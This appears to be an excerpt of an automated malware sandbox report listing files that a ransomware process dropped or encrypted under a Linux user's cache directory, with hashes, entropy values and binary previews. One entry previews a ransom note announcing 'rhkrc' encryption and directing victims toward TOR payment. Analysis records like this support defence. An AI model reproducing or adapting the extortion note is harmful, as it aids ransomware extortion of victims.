                  Entropy (8bit):5.919668643750269
                  Encrypted:false
                  SSDEEP:6:d33N+oWICmnMnoV1zmhOO/EUyp6XcXUGUI8WdX4t:cD8MnO2DcUBUUI6t
                  MD5:74C21FDB0A6437330FD4E569976376BD
                  SHA1:EAB5649AE5046FDCAE54AEA360F6E3F1D9778539
                  SHA-256:52CB072B03D96F8C8EB41BE62107EB6E056ADA49C95CD7DD0A0A5684CC604F02
                  SHA-512:71FECD29ADC18C3C89722A6B38B3293346CAC1ACBD882523CED76E52C835B181CDEA6B5F00E9D75F6526B6AA017BAD3C9D14D531259EC86DD2E98CB41AFFA8BA
                  Malicious:false
                  Reputation:low
                  Preview: .e@.....|.........)^......U.!0..'....}.6Y.G.h...3aT....&.....(.(....$h.M.dl..&.w..{...q+..%..<C...@?..cq%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................#j.B._sm.1z..)T.#.....^d........:.XgY....v.Y............
                  /home/user/.cache/upstart/gnome-keyring-ssh.log.6.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):331
                  Entropy (8bit):5.89985888542266
                  Encrypted:false
                  SSDEEP:6:07sZL/AXvtldsSCD/H11zmhOO/EUyp6Xc6AeTth9i0lb2G:E0LOlWRT2DcUBnv/9VB2G
                  MD5:49ACC628F6FF3C7616269FD280DCE571
                  SHA1:3C37F8E05C7CC3692FFBB47995F28985D4C483EC
                  SHA-256:F3F7EAE939F3A6BAF650330574CD9890B8EB195CF236CB335C43CEEC85F49281
                  SHA-512:670217223AA9D7B55564E2370D8FE05F16D6FDA1E8A94BFF8A6975C00EE1279BD62D7F8B7C6EE2C6C8389F02F2A5FE0B3956240E14DC850D044A6AD99E29C72A
                  Malicious:false
                  Reputation:low
                  Preview: ..b>.G.....a*s....o......L..=..=3.l..z..e....p...s.......V..{.C.J\Y..,A.c+..d.....?$..d....!...G..Z%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................qFU>...FIv..{..ooH...Z..XGW......B.e.G....c.........N..{
                  /home/user/.cache/upstart/gnome-keyring-ssh.log.7.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):331
                  Entropy (8bit):5.853393255238775
                  Encrypted:false
                  SSDEEP:6:FAaDNGcKeZTxVG1zmhOO/EUyp6Xci3LJjYdu0:FhN5KcPS2DcUBfJ50
                  MD5:718304587665FAFAFEC0C8AB018EFD47
                  SHA1:768D664343C968665D96617196D59A061198ED53
                  SHA-256:1820D66D5198BC4EEE946E78BE9D587680A17C400DB41B99FB946DB5C446753A
                  SHA-512:EF4135B434B505ABA9B04A5AD1F2378AA0EA56E5B9188E3A1A7A069CFC66A322DE51F97C601406579A95F343B455E94108E21F59E08EC2D8527372475F4A1CDA
                  Malicious:false
                  Reputation:low
                  Preview: .IQ.$.v...9....]...L..5.....W..Vpp..........;.Y..)...v..&..B.+^9[cr..h.L..5m.......m....vZ...!._8..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................[....TH..m`.....mo.-u...`....^..u..e].....T...........K
                  /home/user/.cache/upstart/gpg-agent.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):5.9713698945561955
                  Encrypted:false
                  SSDEEP:6:LhlvSJ60tLnLHOS11zmhOO/EUyp6XcBjv1B1t+3:d1SX5LJ2DcUBWXW
                  MD5:2F9D38AC27DBD40BB0C91923446BCD72
                  SHA1:1B11F546DAF43E7CCDB2B5617C3C3D2A93F943CB
                  SHA-256:4D9C78C5F45478D33EE786ECB9126349CCC53FD77D5C18274DCAA4A5694BBD6F
                  SHA-512:8C155882B37C7DEF62F4D58EBF8E49729770A272E3F45A4E4FEB879CE467D402AC95D0C70D142328A5854AC81794860D8710BF7317899339704C210CD8E2630C
                  Malicious:false
                  Reputation:low
                  Preview: Ho...f.=s.@a..!.w.>....wK....C.qY..Q...9W..BU..HG^.....RB.....].-_i@.nB...w..9^c9.D.p...,*u..e..g......`I...*%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................Z..x..(A..Z...[.....5.y..$.n(....7..~.72..........W.
                  /home/user/.cache/upstart/gpg-agent.log.2.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):350
                  Entropy (8bit):6.038082044157875
                  Encrypted:false
                  SSDEEP:6:L9egLWoYUTllXR11zmhOO/EUyp6XcuHsdmilf:0kWo5TlhRL2DcUBXHsHlf
                  MD5:7DABD127ADBA56502BAB4DC709B19014
                  SHA1:1F41C1BE482D8F1EA89FC59161BDC470EE9BC92C
                  SHA-256:DF6DD7639E1DB22AC2CB98678915E7F88655DBEBF64B42051733CE28FB552C1D
                  SHA-512:BD6E90B82614C059D07A5A94FEC90E51C15D70EF9CB0D63161892BBF1B8096D636C0733741E1E0B770BA8C0B7BE93CB3387E946AF53069789D064DCBD47C392C
                  Malicious:false
                  Reputation:low
                  Preview: q....jV.mup...t.EQV^......L.........v..#}..G...^=..7'...^...L....?H...k......x4.@yk]n..>]p2..y.......+@.].....=.].y..i%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................L...w<.)..'|..S.....JM.k9.>.FCa..h.e.5..U.e.......... Zj
                  /home/user/.cache/upstart/gpg-agent.log.3.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):5.993392695155392
                  Encrypted:false
                  SSDEEP:6:lUV4/E3tL8tIgo1zmhOO/EUyp6Xc7vSTrlad/msn:lg4Mdz2DcUBuvSlcn
                  MD5:423EDFB59999F5A84BCEFF2A587A87B5
                  SHA1:C19A3D3D079371F3DB4912494EA87E07AB625F51
                  SHA-256:EE1A0B90110A89A314EC44244C2245F2D1950669BC83A2AC37376A654844457A
                  SHA-512:996DB6DCD00CD83C6AF29FB73B5ED162F13607DF6383FED68741108493EA560F5D10A89A989DFBCB7B9D1C8FE5D7637796B3E538D175F3F9DFCB4DEA6B76387F
                  Malicious:false
                  Reputation:low
                  Preview: R..\...O...>|....X..v.U.."K.=.c.....L:e......Q......HhUC...f....j.2........[I.-y..l.v.H.i.NI.bd.08x.JG?).....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................e........J..Ng...jC.L.A..f.I......D/.E...........NVX.
                  /home/user/.cache/upstart/gpg-agent.log.4.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):337
                  Entropy (8bit):5.997316864080545
                  Encrypted:false
                  SSDEEP:6:fqRMjLBF65rvFtAb3Knc11zmhOO/EUyp6Xc5F1Ojill//:fqCB8BLvcL2DcUBuOu/
                  MD5:55926C77BC867317681B8309E4753138
                  SHA1:6D2E4E8ECB78C25B24A36F5B14713C4B9AB3A3F0
                  SHA-256:40936240C10E2EFD22CB759623A15DB8A1FBD5235DB56EF4C30ECF799380F6FB
                  SHA-512:26642AA41E7AD3927B96ADEE0CFAA3E06FD3E12553C4CF9953D1B4C11101EF19E9A0DB1AF0F92005FBE060BA82A1120776D2516880D809435A8D9B0B54AB4DD1
                  Malicious:false
                  Reputation:low
                  Preview: X....w$.)E.S..../.f,g.(.>.W..o...2.Sb.i....p".15.....p.El!$..v....0.z..."b.|..x.M.J~..A.)...N...,l....G.-%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................)mt"......]...z...%..gP.-.....R....V..t.Q.............T.
                  /home/user/.cache/upstart/gpg-agent.log.5.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):346
                  Entropy (8bit):6.007953031335177
                  Encrypted:false
                  SSDEEP:6:x0pEkKk1HLv3Xf6DuU51zmhOO/EUyp6XcYfPJieCt:ypzK8Xfy2DcUBpP0t
                  MD5:26EE5C24319F58C1B39338808FEBF4F3
                  SHA1:8DAF98E815C662769A71A03ADF0383A6E3164473
                  SHA-256:400845FDAB5B0901526F76CCF3DA6FF745D6EF5DD267185A176875399AE8F453
                  SHA-512:23F586E375EF31CBA153FB6E6F3BF1FFFE6E71C199B9B507F9F8645A0E13DA643EA71A4957CD929B3424628748C566062109C2EB6B35F9E4AC53658389E5BB59
                  Malicious:false
                  Reputation:low
                  Preview: .l...!.G.........?Q._.X..../(.+.]%...5..f....$..._.I.[.U.W...|.@H..T...........[...m.q..;q..a.bV.N)...k......7U...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................8l......*Ca..O.."o.;.i.6....4yH.......n.d.........s...
                  /home/user/.cache/upstart/gpg-agent.log.6.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):5.97044758093314
                  Encrypted:false
                  SSDEEP:6:E2TdHBri+cEEUDVU1zmhOO/EUyp6Xc1KdltIoE:nJHBNa2DcUBoGltIB
                  MD5:828CF0E02CA993C77A00B698D03A4DEC
                  SHA1:6B7C68AE755309889C6776A87A7AA714BE812350
                  SHA-256:2876F3FBFEEE80CAD790DA3C19AC26082F7D730551936E0AD964F8FC0599B633
                  SHA-512:16E3A651325679AEB80CB7618288FA080E8754014C30683B9837FBF571845A5F87D511BDC89DCC32B3AE537692D632105C5B721AA562E6CD87FFEF9149DB1393
                  Malicious:false
                  Reputation:low
                  Preview: ..i0D.c}VZ.O.6..N..VWi... .....G{.V4..8.+.M.w6..I=t..0.0....... F..>.V_=_j&.....\....<.........r.g..E!.c..G9.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................XPk.....CF..x]=.....J.....P.\.U.Q....JtK..j..........r.
                  /home/user/.cache/upstart/gpg-agent.log.7.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):5.988553478617416
                  Encrypted:false
                  SSDEEP:6:E/Zo9o7tNYsc8I85MV1zmhOO/EUyp6XcY6B8o/BA/lZ:aqK7RcE+r2DcUB3q8oJy
                  MD5:574C4A2724F323472617C68908E2CE84
                  SHA1:1028497A86A568AB87D4BFDFBACEFC864AA26783
                  SHA-256:BD5DBE23F992F70616D4CDD76B567CA56C1904B838809C8BC0027ABC65A54384
                  SHA-512:1749DD8AF0F79C358569938395A0DC48380709935178ECC90EDB27D6371CBF7B08C7D8E5872C412288FB8422831CF75AFB14FF054BFA032DCDB55A5EC03D03B2
                  Malicious:false
                  Reputation:low
                  Preview: ....a;.6z..W.3.......m.u..M...^G..G....a.....|R...e(....7uX..2....R..<..5/..m..G.\..>*_.5dU..Y...o...9H..m..2%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..............................................................................................O.8..?[..'.....I..-]$.VL.Zd....w.4.N'.........z...
                  /home/user/.cache/upstart/indicator-application.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):459
                  Entropy (8bit):6.564841415037109
                  Encrypted:false
                  SSDEEP:6:hLqY2lg8IDBuOjvz64MK+9J5Gm7LwQSlCAiIkh1mgzW5B1zmhOO/EUyp6Xc54Hwr:hwoMSZd+9JY5DuIkDNW532DcUBCXMa
                  MD5:0B588EFEA3F3512C9FEC300768419A77
                  SHA1:0B38CF6B4EA2C8271DEDB1632520F752233ED9A6
                  SHA-256:BC636CBE095EBC2E9DDC8295A7910AB4C75DC9E5DADFE4418AAE0DB716C10A75
                  SHA-512:21DBC5C7490EE299751649C008FF1FC39DD04F3708F5F66F55A102C6E542D315DBF56D43E26453440AFC9E43F93ABB090CC4DBC8220769551B9EB362DB019786
                  Malicious:false
                  Reputation:low
                  Preview: *q.G..."...........14......a....Y....Xo.@...r.G....l..u...#..i...9.C../N)...Pp...<5..k.|#Y6...qS..`g9..Cto....j......1...J.K0.vo...U+(.n^q@o.....C6...?..-q.Z...g..G.9..S....zg$....R..^To..........W.....).WaL^w6..F&.g.w.:..K.N4.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................Z...."e]j._].p.P.5..3...5..M..nR.:...*.r.te.........y..
                  /home/user/.cache/upstart/indicator-bluetooth.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):352
                  Entropy (8bit):6.059545338175818
                  Encrypted:false
                  SSDEEP:6:21Bd1aJl919Zo/LNB13KTnu4Qo11zmhOO/EUyp6Xco3zCGPKHwbMv:uMzZoDR3Krr2DcUBvepwbMv
                  MD5:3895DA408D7D8E17DC265447E79AC275
                  SHA1:E63E8B6F50B6B4938CE761A551B190F1CAA32C85
                  SHA-256:EA8AD9DFE71001A8AD72DE96FF392C679C9B53BE6B761E67BB769DA4C74DAB27
                  SHA-512:E331E0A00421201C26BADD16922B22482305157ED8FBC7825AF8C38E14CFD5CA9642C2A5FD4630C982BB1531C950092ACD659CC265605D3CB3D1C10FE038FB4F
                  Malicious:false
                  Reputation:low
                  Preview: /I..`.[r..y.......Xxk.....-...8..4.[..3.....d8.x.>F.....9..u....i%h..Wg........RX...`.6.@..".4..y..p9......J.)...&<O.l..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................FbI.C..Y...t'2..@........U....[...`.ER...0w...........`
                  /home/user/.cache/upstart/indicator-datetime.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):497
                  Entropy (8bit):6.718831748572886
                  Encrypted:false
                  SSDEEP:12:L8MyjXkesk07pFOcred/6PHuL2DcUBkRtfSB:QR3sk07pFOJJ5L2Df9B
                  MD5:0E71D0E28A26BDFD4A267325A89C01D3
                  SHA1:412503E3B98B9137675B5522DC5028BDB474E495
                  SHA-256:34CD2B0D0F18D606BAEC3631BD471A80348105A16A3249C1BCA0323D8AADE97D
                  SHA-512:16EBA1D854E71712EFBAA5B59458CBAD9E7B39CFC66B19C4F7084EF8E1D1ACC2DBB9339C771EB61DDCCB9CFED024D34BCD23E3556C3F744514AD3EE86C5301B5
                  Malicious:false
                  Reputation:low
                  Preview: .A._i..]......b..V.QYg.QoS.....(...8..........@.....-..;^k.)Z..&t...A.O].g.9.%Jd.F......p.i....(|KhA..#}..}?H...0v.6..o..........._>..[O.....6[Xg.+..B...E#.t.=.4...aEi........'7.mD...J..Q.l1s..?...h#..L7..x.X...4(Y($..c..(...V.......W.p...T*...@...3.E..'....9.....G%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................(.th.k..u......7../..z.eI.:W.7.{.9...\.R..J............3
                  /home/user/.cache/upstart/indicator-keyboard.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):412
                  Entropy (8bit):6.314622814203879
                  Encrypted:false
                  SSDEEP:6:SyVXqJePtxUCMMxN2F84VgtzPL/nPdOZy1zmhOO/EUyp6Xcwxna228FlgB+t/:BpGitSCTNXYE7UZO2DcUBfa0lgBE
                  MD5:137007E32AFA75FF3FBAC2694CE823AA
                  SHA1:43B7519FBB74AF11336F8C5150226491CD9CB4C9
                  SHA-256:DA62FBE844EDA10E834B8FF0D83D6EF0BB1E99D19EAE975C8490F780B21CAFCD
                  SHA-512:8A431537B299DB2003D112574B71CB7D80380ACD3EB083FA42AE998716B4AB0C13D03308C4FEAD904B06E8437E034204C71EC6B5F4F825970937AFB54B9CF26B
                  Malicious:false
                  Reputation:low
                  Preview: ..W..Y..Vu._..-.H...........4..P.... .LZX.l...Z.|.z...-..J.ct.p..F....W./.<)sNu...I8d.)...\^j.X=.c..?.....F...9n.J.j..j'.D......(............-..4;....Q)..SN..mz..e..'...T*...4.::Y.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................<Rb*..^..T....G..RY..j.q.}.z+.&=.......)............
                  /home/user/.cache/upstart/indicator-keyboard.log.2.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):362
                  Entropy (8bit):6.128756203177237
                  Encrypted:false
                  SSDEEP:6:EFB8Loo6v+21YkpvNLv3QFeN11zmhOO/EUyp6XcjKhwVqwXf+u0Ei:EFvo6lSklNbgFS2DcUBVhwrpA
                  MD5:E25D418E48697B2269857C37143D1168
                  SHA1:9FB456702327B9C089764F3AE0CC9213BD801182
                  SHA-256:506D26ABE15FB577C1DEBB6F514BA2C35C5A64F95F3B8C580397A01ED782E00A
                  SHA-512:748DDA394DED47D2F52F050218778A5D42DBDDE6763F68A713DBEF48B5231AB09C8B44B973E0F9527114055EA4FE5ECCBF3B21FBF9A2F564D0B93573D4E27EB5
                  Malicious:false
                  Reputation:low
                  Preview: ....n......j..n:f.+.x.....n.a..E..s.l..An...o.j...`W*w]...O...>.x.1..p..w.....)...ini;l~..+..^.....1L=E1N...5....%&8!.....3..YA...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.............................................................................................../3.&.qW.p..8+1.....*.|.p..8..v=.:..Qa........3...
                  /home/user/.cache/upstart/indicator-power.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):6.025550317370337
                  Encrypted:false
                  SSDEEP:6:/FbbeTTvzJxb26mjT1zmhOO/EUyp6XcRk0UmPn:tQbJxb2N92DcUBLNmPn
                  MD5:347112E234537B3D2295571646EB6DA9
                  SHA1:BE64889261AEFB4AEBC204DFF3A30CE9042091EB
                  SHA-256:9987B7085A581819EB2F6B397161C14F1102E52BB5F6FE958B4D00B214EC98E8
                  SHA-512:2EF56C6F96A58B204F827E6F35DB73B55E3B0AEFA01C0A7D049E1BEF0BF5D0C295597D36BA1017329098FD73803E8D2EDABF6DE54D450CF94C9F3C8EEB33E4A7
                  Malicious:false
                  Reputation:low
                  Preview: ..1....H_R...9.=......T/.}/.22"............e.......s..p.2..-a......l,..2}u.6.j...y..7..)........._.1.M.*n.`..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................LB..K..E.....`m^...o=....=T0QE.....T@.>..=............
                  /home/user/.cache/upstart/indicator-session.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):672
                  Entropy (8bit):7.093642492241879
                  Encrypted:false
                  SSDEEP:12:JPONlvim3CnIhZBtfRtDbq+Aj3c1IEsNpCemqte/a2DcUBUoOfY:NgNJh/V/q+AesNpnlr2Df6rfY
                  MD5:F9C6D5A8EA1CDDE976DD114110AD3753
                  SHA1:1859B4DF403E961B7F3F3E18902BBB15A5D971FD
                  SHA-256:771EEFCF13C8CE974099F9F4E6B59A5E33CF39E81BDFF6B36043A8BB2BA01A01
                  SHA-512:73E9C5264C7D380BE602206FE17887FDA773887ED7A712BCF9681107F14588441714CDBCEC5684961CDF619AE23D72770D55600F9E60E7F47E771208BF7DC965
                  Malicious:false
                  Reputation:low
                  Preview: ............E..=.....fw..!d .ob.@....-..Xt.o P,.....@..Q..h........>8.R.M.iq{ .:L:.+Dw....|.dx]./....%.._.Y~....v........f.........7.\..%.y%t...l.3.0..&.9..*L.N>U;.(P...3.D7m...*......i..*...\$..+.E.1.S.l..b.U..6....q>...h...!u..v......78.D.y.....M'...qa*..../.%<...[.}.p..A.t...."}ux...f.`..J.d....0H..N0....C....M......~G...:.....!Y}.%.Y,..H....V0y....do{..{.......M.....Y....0TT.eP.n@...*%...[.H..S:..6.l.9.R..l_~....u...7.$..h\HG..]S...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................m...0..0.......x'<IQSn?.l.....)R..,]h.,.7.a........`..j
                  /home/user/.cache/upstart/indicator-sound.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):672
                  Entropy (8bit):7.084542863376686
                  Encrypted:false
                  SSDEEP:12:35+/o8M1W5XZ+88kKJLJ/ONkEt8hcZUgS2L2DcUBpmoNt:J+c1WBRJKJ0ht8hcZUX2L2DfPT
                  MD5:4F6075325CE7579BA74D626C11E640BA
                  SHA1:35836D7C2586C1F34248896447168832E9D748A3
                  SHA-256:E554949244A990CBED3631FE9BD0CCFEB31390D295302425F501F01E7F6804E4
                  SHA-512:6A97A0B164A8A8697DED5683BB7110DFEC58787A3D8B9D3BB7B76E25FB69E14489C0223281D8E3C4793908AB2CEBFFB89A7E48D94B53B4A2C88D978B6B384CBA
                  Malicious:false
                  Reputation:low
                  Preview: ......kOH....^4..=;.}...%.....'.j...9;.....H..../...7.l....kK...}f.=..Y..[...!.L[T...+Ow.......q!......>.mQ......./m.....[..[.7.~h..3Z.....2...qa.7......,..s7.......1..1.......)......I.W....}...f.u.A...)..\.Ks...f/.`.e=.../d_.......1g;..A/..X.../,...`..+&..R.P.....qG.~1.Z........Q.>#3"...w..'..........-...}....YX..aV....Yn.8&[.#rt.#"..F..,....B..p..w,[..R...a.....*<....P.JAg..[F.g..gM..[|.>H..-...r...Yqb..=.&.........6}...f..cLg..X...7.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................z.~......S.......c.c.%,H....@..e...r................K.T.
                  /home/user/.cache/upstart/indicator-sound.log.2.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):518
                  Entropy (8bit):6.8069941310317255
                  Encrypted:false
                  SSDEEP:12:I0ne3zZ4ZhkcFQTEyMNdMu69YR1rAk2DcUBDC5qxoN:Ip0OcoEyv9YXH2Dft6TN
                  MD5:1DE2FF776A11A9F6105276CD0FB8C80B
                  SHA1:1B62ABBA5303E5A47D7C6C47F4B4D8CF3DB77F85
                  SHA-256:7EA75D7316A6C17780D062534CFE183561A528AECCC53B0DBBFA4311DA064969
                  SHA-512:839C9B3A8B9A29EAA1E7C56B69516EF8BF06F5820A3021A8D765D4A49BD65C0CEF04B1E3E3B8871B031CDA796144199BB195D59CB267ED15C69B09A12E815C12
                  Malicious:false
                  Reputation:low
                  Preview: $.8...C.W.A.fFs...t.?K5..m".....D..m....,.L.Hb,%.[....-."...!..zX..D...$...U$..U.m........y....Cv%.CT!.L..2...<.,.E5........k.../L.'......|....c.k.......Fi-f4........p.S..A.o..lx..7I1.I=..u.#6K.6....|..=`j.....hty.Ks.G.F<*F....}_zo.MM.&df....-..)..+.i.OC6...0J..m.....[.1]T@....#.Y....(%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................A..x..0fj#m.U...]\3.S}....\..ra_....[`"..Y........}..m
                  /home/user/.cache/upstart/indicator-sound.log.3.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):525
                  Entropy (8bit):6.818610556028671
                  Encrypted:false
                  SSDEEP:12:I/qpRgnoQkg9LYU3O1GoFFKvXO2DcUB4qFI:ICHiTvLt3O1ZFKvXO2DfqqFI
                  MD5:918FDBAC9A1D62EE7B5242A513F54916
                  SHA1:C21375726B74E00AF66DC92BDBADA516418B02EB
                  SHA-256:5E4AA56D9FEABE38EE130EA9F11D25560D2286E5AB4EDF3E849B569BB49956B1
                  SHA-512:609DBE222986181ACF2F448DF0DE49F97E4E113374DC4DEFC729D6AC2FEDFBCEA8A9E1B651C6C0ECF320B129CE13ED47B921F4645FBF3956FD81D1303B381BFB
                  Malicious:false
                  Reputation:low
                  Preview: xO.....H..E.1).a.]9.-..E<....K...R\Sm3..)d............J5a....k..S... .FD+.-..6=!A......i....C....K..O.7..w.....#s.....k.....q....C..h...7N....../..&,R..Y....SBs.tA3..\8W.k......h..4.pOa.o.....e.w.=Y.9...+........?...\.L.k....w.[e......~7G.'....J..e.p-N.*......q..%..Q..{...g0.G%6Wu{.V Ng.{IH.t%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................Ie...kN..:.Ib|U........-...n9PZgiC#.......I...........9?
                  /home/user/.cache/upstart/indicator-sound.log.4.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):540
                  Entropy (8bit):6.807120419443735
                  Encrypted:false
                  SSDEEP:12:guDXWNB1xwyE2Ugu31sGytYopfDBGlzTf2DcUBO0q:3Wz12yFHw1sXYoZDsr2Dfk
                  MD5:900B5F28464FC6460971806696FDFE06
                  SHA1:38F418D0E1134010D7177C00A216E9E153EFB7F0
                  SHA-256:58FC5BE6523CCC2996B192ECE10880498DD8032B8757A060F9916C6F1E6E06E8
                  SHA-512:6E58ABEBB6BB606AF0BC8DA64699910AAF682FAF97EC707556B7472E9DC146D5BEB469193C53381D191DCB9B5FA7202D67372BC3C4C3274E0205659E6BCBB3FE
                  Malicious:false
                  Reputation:low
                  Preview: ..D'|....J...B...".)..o...l......[=b.ia.5....hP.........WD..].a.!. ......n..f......YJ..E...E.....Y*.]..u....x1|.U.Y.]{.....D.......}..Q.\.'....n1..<.IG?.h....M...Ie....-...d....T.iUD.......v.e].c.[lv..v@$'....;.D ND.(/..ul...,_?......Z]...`7.....fy._....&..oF.%zNN?.......Y.....r.5#....9.......I..,..1....-_.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................,..?.8O@a......$....r(...NXZ?...L)......d...........`b..
                  /home/user/.cache/upstart/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/upstart/ssh-agent.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):302
                  Entropy (8bit):5.637031482057825
                  Encrypted:false
                  SSDEEP:6:hrpx6R9l+T/A/Du11zmhOO/EUyp6XcGbRx4pj6pN3:dpERWmO2DcUBfMqN3
                  MD5:395DAA41DD44A4BEC216CC1EA84BA632
                  SHA1:0F4B35D186D0954D12CFA83187CD7A56649BBBDE
                  SHA-256:DDF8751E0044C9B2AF150D8685FEBE70182641616DCC2F858D7FC26328D2B762
                  SHA-512:15ACE70153EFB7B3322FC9ACEC010A61A6790B6ADE15CF844274293B19229B2899C458917BA2A8050661EE8A44E2CEB920B74EA057E9137B4AFB0B59B345A81B
                  Malicious:false
                  Reputation:low
                  Preview: ....l.f.... .a<....! .=o:Py*.:o$..X/BN......X....{..R.1([..3....0.Fig.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................%>...c...gZ.v..kIa..,..j.MR.a...MBV.._...............
                  /home/user/.cache/upstart/ssh-agent.log.2.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):320
                  Entropy (8bit):5.817864923795941
                  Encrypted:false
                  SSDEEP:6:EJoLRdZy+sz1zmhOO/EUyp6XctK2oHlNIOtR:2CdZy+sR2DcUBCE4G
                  MD5:8CB5E71BE1FA7AB15841629966908AAC
                  SHA1:0AA1062383DF219A9019E0E4F7FF4CA041459911
                  SHA-256:D0A55C9ACB45085F8BE81F201EF51F976DC191B3E632B157316EA2D6C4D395F5
                  SHA-512:05056B34A0BDD2BF935D07508D7FB504B437AAED67B11433EFC5B8752DFFD7083A107E75D0529937875B6D5C3564955113510887A1AB7A76A911B245FC54E50A
                  Malicious:false
                  Reputation:low
